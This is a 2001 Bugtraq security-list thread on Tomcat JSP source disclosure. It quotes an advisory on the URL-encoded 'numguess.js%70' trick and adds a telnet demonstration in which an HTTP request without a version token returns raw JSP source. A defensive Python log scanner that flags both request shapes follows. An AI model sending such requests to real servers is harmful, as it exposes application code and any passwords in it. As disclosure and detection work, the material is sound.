[20022] in bugtraq


Re: Tomcat may reveal script source code by URL trickery

daemon@ATHENA.MIT.EDU (Eric Daniel Mauricio)
Wed Apr 4 06:54:49 2001

Message-ID:  <200104032047.f33KlNL11550@spock.bestway.com.br>
Date:         Tue, 3 Apr 2001 20:47:23 -0000
Reply-To: ericmau@BESTWAY.COM.BR
From: Eric Daniel Mauricio <ericmau@BESTWAY.COM.BR>
To: BUGTRAQ@SECURITYFOCUS.COM

There is another way to get the source from a jsp page using Tomcat.

If you don't write HTTP/1.0 or HTTP/1.1 at the end of the GET request,
you will get the source code and not the processed JSP.

In other words, use Apache + Tomcat if you intend to protect your source code.

telnet maq106 8080
Trying 10.0.0.106...
Connected to maq106
Escape character is '^]'.
GET /examples/jsp/num/numguess.jsp
HTTP/1.0 200 OK
Content-Type: text/plain
Content-Length: 1237
Last-Modified: Tue, 19 Dec 2000 18:54:46 GMT
Servlet-Engine: Tomcat Web Server/3.2.1 (JSP 1.1; Servlet 2.2; Java 1.3.0;
Windows 95 4.0 x86; java.vendor=Sun Microsystems Inc.)

<!--
  Copyright (c) 1999 The Apache Software Foundation.  All rights
  reserved.

  Number Guess Game
  Written by Jason Hunter, CTO, K&A Software
  http://www.servlets.com
-->

<%@ page import = "num.NumberGuessBean" %>

<jsp:useBean id="numguess" class="num.NumberGuessBean" scope="session"/>
<jsp:setProperty name="numguess" property="*"/>

<html>
<head><title>Number Guess</title></head>
<body bgcolor="white">
<font size=4>

<% if (numguess.getSuccess()) { %>

  Congratulations!  You got it.
  And after just <%= numguess.getNumGuesses() %> tries.<p>

  <% numguess.reset(); %>

  Care to <a href="numguess.jsp">try again</a>?

<% } else if (numguess.getNumGuesses() == 0) { %>

  Welcome to the Number Guess game.<p>

  I'm thinking of a number between 1 and 100.<p>

  <form method=get>
  What's your guess? <input type=text name=guess>
  <input type=submit value="Submit">
  </form>

<% } else { %>

  Good guess, but nope.  Try <b><%= numguess.getHint() %></b>.

  You have made <%= numguess.getNumGuesses() %> guesses.<p>

  I'm thinking of a number between 1 and 100.<p>

  <form method=get>
  What's your guess? <input type=text name=guess>
  <input type=submit value="Submit">
  </form>

<% } %>

</font>
</body>
</html>
Connection closed by foreign host.


   ericmau

"Sverre H. Huseby" <shh@THATHOST.COM> wrote:

> Tomcat may reveal script source code by URL trickery
> ----------------------------------------------------
>
> Sverre H. Huseby advisory 2001-03-29
>
>
>
> Systems affected
> ----------------
>
> Tomcat 4.0-b1 (latest milestone) and nightly build as of 2001-03-28
> tested.  Other versions may be vulnerable too.  The problem is only
> present when using Tomcat's built-in web server, not when using Tomcat
> with Apache Web Server.
>
>
> Description
> -----------
>
> Tomcat (http://jakarta.apache.org/tomcat/), the Reference
> Implementation for the Java Servlet 2.2 and JavaServer Pages 1.1
> Technologies, may be tricked into revealing the source code of JSP
> scripts by using simple URL encoding.
>
>
> Details
> -------
>
> It seems that the built-in web server in Tomcat does URL decoding in
> an unreasonable order.  URLs like the following
>
>   http://XXX:8080/examples/jsp/num/numguess.js%70
>
> where %70 is a URL-encoded 'p', returns the source code of index.jsp
> rather than running the script on the server side.
>
> To speculate: The JSP handler is skipped as this URL does not end in
> ".jsp", but the static file handler is nevertheless able to map the
> URL into a correct file name.
>
>
> Impact
> ------
>
> This design error makes it possible to fetch the source code of JSP
> scripts.  Such source code may contain database passwords and file
> names, and may reveal design errors or programming bugs that make it
> possible to further exploit the server or service.
>
>
>
> Reported by Sverre H. Huseby, shh@thathost.com
>
> --
> <URL:mailto:shh@thathost.com>
> <URL:http://shh.thathost.com/>
>

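As an added example (not code from either post in this thread), a small Python access-log check from the defender's side that flags both request shapes described above: an HTTP/0.9 simple request with no version token aimed at a .jsp, as in Eric's telnet session, and a percent-encoded extension such as js%70 that only decodes to .jsp, the trick in the Huseby advisory. The log lines, client addresses and timestamps are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines in Common Log Format (not from the original post).
# Line 2 is an HTTP/0.9 simple request (no version token); line 3 has the %70 extension.
SAMPLE_LOG = """\
10.0.0.5 - - [03/Apr/2001:20:47:23 +0000] "GET /examples/jsp/num/numguess.jsp HTTP/1.0" 200 2048
10.0.0.5 - - [03/Apr/2001:20:47:31 +0000] "GET /examples/jsp/num/numguess.jsp" 200 1237
10.0.0.5 - - [03/Apr/2001:20:47:40 +0000] "GET /examples/jsp/num/numguess.js%70 HTTP/1.1" 200 1237
10.0.0.9 - - [03/Apr/2001:20:48:02 +0000] "GET /images/logo.gif HTTP/1.1" 200 5120
10.0.0.9 - - [03/Apr/2001:20:48:10 +0000] "GET /examples/jsp/num/numguess.jsp?guess=50 HTTP/1.1" 200 2100
"""

CLF_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+')

def parse_request(req):
    # Returns (method, target, version); version is None for an HTTP/0.9 simple request.
    parts = req.split()
    if len(parts) == 3 and parts[2].startswith("HTTP/"):
        return parts[0], parts[1], parts[2]
    if len(parts) == 2:
        return parts[0], parts[1], None
    return None

def is_jsp(path):
    return path.lower().endswith(".jsp")

def check_request(req):
    # Returns which disclosure pattern from the thread the request matches, or None.
    parsed = parse_request(req)
    if parsed is None:
        return None
    _, target, version = parsed
    raw_path = target.split("?", 1)[0]   # drop the query string
    decoded = unquote(raw_path)          # the name the static file handler resolves
    if version is None and is_jsp(decoded):
        return "http09-simple-request"   # the request shape in Eric's telnet session
    if is_jsp(decoded) and not is_jsp(raw_path):
        return "encoded-jsp-extension"   # e.g. numguess.js%70 from the advisory
    return None

def scan(log_text):
    # Returns (line_no, client, target, reason) for each suspicious request.
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = CLF_RE.match(line)
        reason = check_request(m.group("req")) if m else None
        if reason:
            hits.append((n, m.group("host"), m.group("req").split()[1], reason))
    return hits
```

A 200 status on a flagged line is the sign that raw source was actually served, so the status field is worth keeping next to the reason when this is run over real logs.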